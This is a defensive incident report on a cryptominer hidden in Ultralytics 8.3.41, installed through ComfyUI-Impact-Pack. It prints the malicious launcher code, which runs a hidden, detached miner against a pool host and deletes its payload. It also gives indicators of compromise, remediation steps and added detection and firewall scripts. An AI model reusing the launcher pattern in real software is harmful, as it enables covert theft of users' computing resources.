Potential Cryptocurrency Mining Attack Report: Security Issues in ComfyUI and Ultralytics

Overview

Recently, unauthorized cryptocurrency mining activity was suspected while using ComfyUI with the ComfyUI-Impact-Pack extension. The issue originates from malicious Python code in the Ultralytics package, which attempts to use system resources for unauthorized mining operations.

Problem Description

The malicious code lives in the downloads.py module of the installed package, at the following path: YourUserPath/AppData/Roaming/Python/Python312/site-packages/ultralytics/utils/downloads.py

Malicious Code Sample

The following malicious code was detected:

import os
import subprocess

def safe_run(path):
    # 1. Make the downloaded payload executable
    os.chmod(path, 0o770)
    # 2. Miner command line: -u <mining account>, -o <pool host:port>
    command = [
        path,
        '-u',
        '4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw',
        '-o',
        'connect.consrensys.com:8080',
        '-k'
    ]
    # 3. Launch the payload in its own session with every standard stream discarded
    process = subprocess.Popen(
        command,
        stdin=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
        preexec_fn=os.setsid,
        close_fds=True
    )
    # 4. Delete the payload from disk once it is running
    os.remove(path)

Behavior Analysis

  1. Permission Change: Uses os.chmod to make the downloaded file executable (mode 0o770).
  2. Executing Malicious Commands: Runs the file as a miner and connects it to the mining pool server connect.consrensys.com:8080.
  3. Process Hiding: Suppresses the input, output, and error streams and starts the process in its own session (preexec_fn=os.setsid, a POSIX-only option), so it runs detached from the parent and leaves no console trace.
  4. File Removal: Deletes the file immediately after launching it to hide evidence; the process keeps running from memory.
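The four behaviours above form a recognisable sequence in source code. The following is an added example, not code from the report or from the Ultralytics project: a static scanner built on the standard-library ast module that flags any function which chmods a path, spawns it with all three streams sent to DEVNULL and preexec_fn=os.setsid, and then removes it, and that also reports string literals equal to the indicators quoted in the report. SAMPLE_SOURCE is a constructed input containing the report's function next to a benign chmod/Popen user; the version check assumes the reported version 8.3.41 is the one to flag.

```python
"""Static scan for the chmod -> hidden Popen -> remove launcher pattern.

Added example, not from the report or the Ultralytics project. Works on any
Python source file, e.g. ultralytics/utils/downloads.py from the report.
"""
import ast
import importlib.metadata
from pathlib import Path

# Indicators quoted in the report
POOL_ENDPOINT = "connect.consrensys.com:8080"
MINER_ACCOUNT = ("4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8i"
                 "WyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw")
REPORTED_BAD_VERSION = "8.3.41"


def _dotted(call: ast.Call) -> str:
    """Name of a call target such as os.chmod or subprocess.Popen."""
    f = call.func
    if isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name):
        return f"{f.value.id}.{f.attr}"
    return f.id if isinstance(f, ast.Name) else ""


def _attr_is(node, attr: str) -> bool:
    """True if node is an attribute access ending in `attr` (e.g. subprocess.DEVNULL)."""
    return isinstance(node, ast.Attribute) and node.attr == attr


def find_string_iocs(source: str) -> list:
    """String literals in the source equal to a known indicator."""
    iocs = {POOL_ENDPOINT, MINER_ACCOUNT}
    return [n.value for n in ast.walk(ast.parse(source))
            if isinstance(n, ast.Constant) and n.value in iocs]


def find_run_and_delete(source: str) -> list:
    """Functions that chmod, launch with streams hidden + setsid, and remove."""
    flagged = []
    for fn in ast.walk(ast.parse(source)):
        if not isinstance(fn, ast.FunctionDef):
            continue
        calls = [n for n in ast.walk(fn) if isinstance(n, ast.Call)]
        names = {_dotted(c) for c in calls}
        hidden_launch = False
        for c in calls:
            if _dotted(c) != "subprocess.Popen":
                continue
            kw = {k.arg: k.value for k in c.keywords}
            streams_hidden = all(_attr_is(kw.get(s), "DEVNULL")
                                 for s in ("stdin", "stdout", "stderr"))
            if streams_hidden and _attr_is(kw.get("preexec_fn"), "setsid"):
                hidden_launch = True
        if {"os.chmod", "os.remove"} <= names and hidden_launch:
            flagged.append(fn.name)
    return flagged


def scan_file(path) -> dict:
    """Run both checks on a file on disk."""
    src = Path(path).read_text(encoding="utf-8", errors="replace")
    return {"strings": find_string_iocs(src), "functions": find_run_and_delete(src)}


def installed_version_is_reported_bad() -> bool:
    """True if the ultralytics package in this interpreter is the reported 8.3.41."""
    try:
        return importlib.metadata.version("ultralytics") == REPORTED_BAD_VERSION
    except importlib.metadata.PackageNotFoundError:
        return False


# Constructed input: the report's function beside a benign chmod/Popen user.
SAMPLE_SOURCE = f'''
import os, subprocess

def safe_run(path):
    os.chmod(path, 0o770)
    command = [path, '-u', '{MINER_ACCOUNT}', '-o', '{POOL_ENDPOINT}', '-k']
    process = subprocess.Popen(command, stdin=subprocess.DEVNULL,
                               stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
                               preexec_fn=os.setsid, close_fds=True)
    os.remove(path)

def run_tool(path):
    os.chmod(path, 0o755)
    return subprocess.Popen([path, '--version'], stdout=subprocess.PIPE)
'''

if __name__ == "__main__":
    print(find_string_iocs(SAMPLE_SOURCE))      # both indicators
    print(find_run_and_delete(SAMPLE_SOURCE))   # ['safe_run'] only
    print(installed_version_is_reported_bad())
```

The structural check matters more than the string check: a repackaged build could change the pool host and account, but a launcher that must hide its streams, detach from the parent and delete its own payload keeps the same shape. Run scan_file against the downloads.py path from the report, or against any site-packages directory you distribute internally.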

Risk Assessment

Potential Impacts

  • High System Resource Usage: Mining significantly increases CPU/GPU load.
  • Hardware Wear: Prolonged high usage may shorten hardware lifespan.
  • Security Risks: Could endanger sensitive data or overall system security.

Source of the Issue

This malicious activity is linked to a suspicious version of the Ultralytics package, which appears to be installed as an automatic dependency of ComfyUI-Impact-Pack.

Installation Path

  • Suspicious Package: Ultralytics version 8.3.41
  • Location: YourUserPath/AppData/Roaming/Python/Python312/site-packages/ultralytics

Trigger

Likely triggered by the install.py script in ComfyUI-Impact-Pack, which auto-installs dependencies.


Network Behavior Analysis

Target Domain

  • Domain Name: connect.consrensys.com
  • Port: 8080
  • Purpose: Suspected mining pool endpoint, likely using the Stratum protocol.

Evidence

  • Explicit mining pool connection details in the script.
  • A hard-coded private key (e.g., 4BHRQHF...) passed with the -u flag indicates an active mining account or operation.

Recommended Actions

  1. Uninstall the suspicious packages:
    pip uninstall ultralytics ultralytics-thop

  2. Remove ComfyUI-Impact-Pack by deleting the related directory:
    ./ComfyUI/custom_nodes/ComfyUI-Impact-Pack

  3. Scan your system: use antivirus software and malware detection tools to ensure no ongoing threats remain.

  4. Monitor network connections: check for external connections to connect.consrensys.com and block it in the firewall.

  5. Raise awareness: share this report with the maintainers of ComfyUI and Ultralytics to prevent further abuse.
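Because the launcher deletes its payload right after starting it, the live connection table is often the evidence that remains, so step 4 above deserves a concrete procedure. The following is an added example, not part of the report: it correlates `netstat -ano` and `tasklist` output (Windows format, matching the AppData paths in the report) to list the processes connected to a known pool address or to port 8080 on any non-loopback host, and builds the netsh rule that blocks that address. Both samples are constructed; the PIDs, image names and the 203.0.113.10 address are placeholders, not observed values. Resolve connect.consrensys.com on your own resolver and put the result in POOL_IPS before running this against live output.

```python
"""Correlate netstat and tasklist output to find processes talking to the pool.

Added example, not code from the report. Samples are constructed; replace
POOL_IPS with the address connect.consrensys.com resolves to in your network.
"""
import re
from ipaddress import ip_address

POOL_PORT = 8080                  # port named in the report
POOL_IPS = {"203.0.113.10"}       # placeholder (TEST-NET-3), replace after resolving
POOL_HOST = "connect.consrensys.com"

# TCP rows of `netstat -ano`: proto, local, remote, state, pid (UDP rows have no state)
NETSTAT_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s*$")
# `tasklist` rows: image name then PID
TASKLIST_RE = re.compile(r"^(\S+\.exe)\s+(\d+)\s")

# Constructed sample output; the 4812 process is the one to find.
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       900
  TCP    127.0.0.1:8188         127.0.0.1:52400        ESTABLISHED     3100
  TCP    192.168.1.20:52310     203.0.113.10:8080      ESTABLISHED     4812
  TCP    192.168.1.20:52311     192.0.2.44:443         ESTABLISHED     2200
  TCP    192.168.1.20:52390     198.51.100.7:8080      SYN_SENT        4812
  UDP    0.0.0.0:5353           *:*                                    3100
"""

TASKLIST_SAMPLE = """\
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
svchost.exe                    900 Services                   0     12,100 K
python.exe                    3100 Console                    1    812,344 K
helper.exe                    4812 Console                    1  1,204,112 K
chrome.exe                    2200 Console                    1    340,012 K
"""


def parse_netstat(text: str) -> list:
    """TCP rows of `netstat -ano` as dicts; IPv6 brackets are stripped."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if m:
            rows.append({"local": m[1], "remote_ip": m[3].strip("[]"),
                         "remote_port": int(m[4]), "state": m[5], "pid": int(m[6])})
    return rows


def parse_tasklist(text: str) -> dict:
    """PID -> image name from `tasklist` output."""
    return {int(m[2]): m[1]
            for m in map(TASKLIST_RE.match, text.splitlines()) if m}


def find_pool_connections(netstat_text: str, tasklist_text: str) -> list:
    """Connections to a known pool IP, or to the pool port on any non-loopback host."""
    procs = parse_tasklist(tasklist_text)
    hits = []
    for row in parse_netstat(netstat_text):
        remote = ip_address(row["remote_ip"])
        to_pool_port = row["remote_port"] == POOL_PORT and not remote.is_loopback
        if row["remote_ip"] in POOL_IPS or to_pool_port:
            hits.append({**row, "image": procs.get(row["pid"], "<unknown>")})
    return hits


def firewall_block_command(ip: str) -> str:
    """Windows netsh rule blocking outbound TCP to the pool address (returned, not run)."""
    return ('netsh advfirewall firewall add rule name="Block mining pool" '
            f"dir=out action=block protocol=TCP remoteip={ip} remoteport={POOL_PORT}")


if __name__ == "__main__":
    for hit in find_pool_connections(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"PID {hit['pid']} {hit['image']} -> "
              f"{hit['remote_ip']}:{hit['remote_port']} ({hit['state']})")
    for ip in POOL_IPS:
        print(firewall_block_command(ip))
```

On a live host, feed the functions the captured text of `netstat -ano` and `tasklist` (run as administrator so PIDs are populated), then terminate the flagged PID before adding the firewall rule; a SYN_SENT entry to the pool port means the miner is still retrying, which is why the port check is kept alongside the exact IP match.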

Additional Evidence

  • Code Location: YourUserPath/AppData/Roaming/Python/Python312/site-packages/ultralytics/utils/downloads.py
  • Behavior Pattern: Unauthorized file execution, mining pool connection, and evidence cleaning.
  • Trigger Condition: Automatic dependency installation by ComfyUI-Impact-Pack.

Conclusion

This incident highlights the risks of insufficient dependency review in open-source projects, which can expose users’ systems to malicious attacks. The open-source community should adopt stricter review mechanisms to protect end-users.
